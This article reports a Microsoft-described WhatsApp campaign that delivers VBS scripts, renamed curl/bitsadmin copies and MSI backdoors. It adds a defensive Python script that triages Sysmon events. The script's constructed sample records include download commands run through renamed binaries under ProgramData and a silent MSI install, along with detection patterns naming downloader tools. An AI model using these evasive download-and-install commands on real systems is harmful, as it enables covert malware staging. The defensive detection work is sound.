Microsoft has issued a warning about a cyberattack campaign that uses WhatsApp messages to distribute malicious Visual Basic Script (VBS) files. Observed since February 2026, the multi-stage attack establishes persistence on infected devices so that the attackers retain remote access.
Microsoft researchers identified a campaign in which attackers distribute malicious scripts through WhatsApp to compromise user systems. While the specific lures used to trick victims have not been identified, the scripts kick off a multi-step infection chain designed to avoid detection. Once a user runs the file, a series of automated steps ensures the attackers keep their access even after the computer restarts.
At the heart of this strategy is a mix of social engineering and living-off-the-land techniques that reuse tools already present on the system. Because the malware runs legitimate Windows utilities under different names, its activity resembles ordinary system processes, and any detection that keys on a process's file name (a rule watching for curl.exe or bitsadmin.exe, for example) will not fire. The commands themselves are the operating system's own, so nothing foreign is introduced for signature-based tooling to flag. Renaming does not change the binary's contents, however: its hash, its PE version resource (the OriginalFileName field that Sysmon event ID 1 and Defender for Endpoint's DeviceProcessEvents record on process creation) and its network behaviour still identify it, and that is where detection should focus.
To further hide their tracks, the threat actors host their payloads on reputable cloud platforms, including Amazon Web Services, Tencent Cloud, and Backblaze B2. When the initial script runs, it reaches out to these services to download additional components. The tactic is effective because many corporate networks permit outbound traffic to the major cloud providers by default, so reputation-based egress filtering does not block the downloads.
Technically, the chain begins by creating hidden folders under C:\ProgramData. The attackers then drop renamed copies of standard tools such as curl and bitsadmin, giving them innocuous file names like netapi.dll and sc.exe. These copies pull down malicious Microsoft Installer (MSI) packages, which install the backdoor that completes the takeover of the host.
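As an added example (not code from the original article or from Microsoft), the following Python shows the kind of detection a defender would build for the chain described above. It runs over constructed Sysmon event ID 1 (process creation) records, which carry the OriginalFileName field taken from the binary's version resource, and flags four indicators: an image whose on-disk name differs from its compiled-in name, a known downloader invoked with download arguments, execution from under C:\ProgramData, a silent msiexec install of a package under C:\ProgramData, plus a process spawned by the Windows Script Host that runs the initial .vbs. The folder name "Stage", the example.invalid URLs and every event value are assumptions constructed for this example, not observed campaign data.

```python
"""Triage Sysmon process-creation events for the renamed-LOLBin / MSI pattern.

Events are modelled as dicts with the field names Sysmon event ID 1 emits
(Image, OriginalFileName, CommandLine, ParentImage). All sample data below
is constructed for this example.
"""
import ntpath
import re

# OriginalFileName values carried in the PE version resource of the genuine
# downloader binaries; a renamed copy still reports them.
DOWNLOADERS = {"curl.exe", "bitsadmin.exe", "certutil.exe"}

# Download-style arguments for those tools (curl -o/--output, bitsadmin
# /transfer, certutil -urlcache).
DOWNLOAD_ARGS = re.compile(r"(?:\s-o\s|\s--output\s|/transfer\b|-urlcache\b)", re.IGNORECASE)

# Silent MSI install: msiexec /i <package> combined with /qn or /quiet, in either order.
MSI_SILENT = re.compile(r"/i\s+\S+.*(?:/qn\b|/quiet\b)|(?:/qn\b|/quiet\b).*/i\s+\S+", re.IGNORECASE)

# A path under <drive>:\ProgramData\ (used with .match for images, .search for command lines).
PROGRAMDATA_PATH = re.compile(r"[a-z]:\\ProgramData\\", re.IGNORECASE)

# Windows Script Host executables that run a .vbs file.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def renamed_binary(event):
    """Flag an image whose on-disk name differs from its compiled-in name."""
    image = ntpath.basename(event.get("Image", "")).lower()
    original = event.get("OriginalFileName", "").lower()
    if not original or original in ("-", "?"):
        return None  # no version resource to compare against
    return f"renamed binary: {image} has OriginalFileName {original}" if image != original else None


def downloader_use(event):
    """Flag a known downloader (by original name) invoked with download arguments."""
    original = event.get("OriginalFileName", "").lower()
    if original in DOWNLOADERS and DOWNLOAD_ARGS.search(event.get("CommandLine", "")):
        return f"download via {original}"
    return None


def programdata_execution(event):
    """Flag an executable launched from under ProgramData."""
    return "executable launched from ProgramData" if PROGRAMDATA_PATH.match(event.get("Image", "")) else None


def silent_msi_from_programdata(event):
    """Flag msiexec silently installing a package that lives under ProgramData."""
    cmd = event.get("CommandLine", "")
    if (event.get("OriginalFileName", "").lower() == "msiexec.exe"
            and MSI_SILENT.search(cmd) and PROGRAMDATA_PATH.search(cmd)):
        return "silent msiexec install of a package under ProgramData"
    return None


def script_host_parent(event):
    """Flag a process spawned by wscript.exe/cscript.exe (the host for a .vbs lure)."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    return f"spawned by script host {parent}" if parent in SCRIPT_HOSTS else None


CHECKS = (renamed_binary, downloader_use, programdata_execution,
          silent_msi_from_programdata, script_host_parent)


def findings(event):
    """Return the list of indicator strings that fire for one event."""
    return [text for check in CHECKS if (text := check(event))]


def triage(events, threshold=2):
    """Return (index, findings) for events with at least `threshold` indicators.
    A lone indicator (an admin's silent MSI install, say) is too noisy on its own."""
    hits = []
    for i, event in enumerate(events):
        f = findings(event)
        if len(f) >= threshold:
            hits.append((i, f))
    return hits


# Constructed Sysmon event ID 1 records (the "Stage" folder and URLs are assumptions).
SAMPLE_EVENTS = [
    {   # benign: genuine curl run from its real location
        "Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
        "CommandLine": r"curl.exe -s https://example.invalid/health",
        "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {   # benign: an admin installing a vendor package from Downloads
        "Image": r"C:\Windows\System32\msiexec.exe", "OriginalFileName": "msiexec.exe",
        "CommandLine": r"msiexec.exe /i C:\Users\admin\Downloads\vendor.msi /qn",
        "ParentImage": r"C:\Windows\explorer.exe"},
    {   # bitsadmin copied into a ProgramData folder as sc.exe and used to fetch an MSI
        "Image": r"C:\ProgramData\Stage\sc.exe", "OriginalFileName": "bitsadmin.exe",
        "CommandLine": r"sc.exe /transfer job /download /priority high https://example.invalid/pkg C:\ProgramData\Stage\update.msi",
        "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {   # curl copied as netapi.dll, same pattern
        "Image": r"C:\ProgramData\Stage\netapi.dll", "OriginalFileName": "curl.exe",
        "CommandLine": r"netapi.dll -o C:\ProgramData\Stage\update2.msi https://example.invalid/pkg2",
        "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {   # msiexec silently installing the fetched package
        "Image": r"C:\Windows\System32\msiexec.exe", "OriginalFileName": "msiexec.exe",
        "CommandLine": r"msiexec.exe /i C:\ProgramData\Stage\update.msi /qn",
        "ParentImage": r"C:\Windows\System32\wscript.exe"},
]

if __name__ == "__main__":
    for index, hit in triage(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["Image"], hit)
```

The two benign records produce no findings, while the three staged steps each trip two or more indicators; in a real deployment the same logic maps directly onto a Sysmon or Defender for Endpoint query, with OriginalFileName (or ProcessVersionInfoOriginalFileName) doing the work that a file-name rule cannot.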
This combination of a trusted communication channel, legitimate cloud hosting, and native Windows tools is a significant threat. By blending into everyday network traffic and system activity, the attackers greatly improve their odds of staying undetected for long periods. Microsoft continues to monitor the campaign as it evolves and urges users to treat unexpected files received through messaging apps with caution.
Source: https://www.microsoft.com/en-us/security/blog/2026/03/31/whatsapp-malware-campaign-delivers-vbs-payloads-msi-backdoors/